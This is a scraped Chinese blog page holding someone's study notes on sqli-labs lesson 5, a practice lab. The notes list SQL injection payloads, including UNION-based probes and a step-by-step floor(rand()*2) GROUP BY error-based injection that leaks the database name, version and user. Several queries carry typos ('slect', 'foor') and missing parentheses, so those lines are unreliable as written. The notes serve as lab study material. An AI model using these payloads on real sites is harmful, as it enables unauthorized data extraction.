zoukankan      html  css  js  c++  java
  • sqlilabs 5

    第一个1不断返回true,2可以进行更改
    ?id=-1' union select 1,2,3 and '1
    ?id=-1' union select 1,2,3 and 1='1

    ?id=-1' union select 1,@@datadir,3 and '1
    @@datadir可以替换为 current_user,database() etc..

    select rand();
    select foor();

    select table_name,table_schema from information_schema.tables group by table_schema;

    select database();
    slect(select database());
    slect concat (select database());
    slect concat (0x3a,0x3a,select database(),0x3a,0x3a);
    slect concat (0x3a,0x3a,select database(),0x3a,0x3a,floor(rand()*2))a;
    slect concat (0x3a,0x3a,select database(),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;
    slect concat (0x3a,0x3a,select database(),0x3a,0x3a,floor(rand()*2))a from information_schema.tables;
    slect count(*), concat (0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables;
    slect count(*), concat (0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a;
    slect count(*), concat (0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
    slect count(*), concat (0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
    slect count(*), concat (0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
    slect count(*), concat (0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;

  • 相关阅读:
    IntelliJ IDEA 常用快捷键
    solr4.5分组查询、统计功能介绍
    用于Lucene的各中文分词比较
    Lucene打分规则与Similarity模块详解
    Lucene
    tar中的参数 cvf,xvf,cvzf,zxvf的区别
    tmux 入门踩坑记录
    第一个shell脚本
    make 和 make install 的区别
    交叉编译
  • 原文地址:https://www.cnblogs.com/CMlhc/p/8858973.html
Copyright © 2011-2022 走看看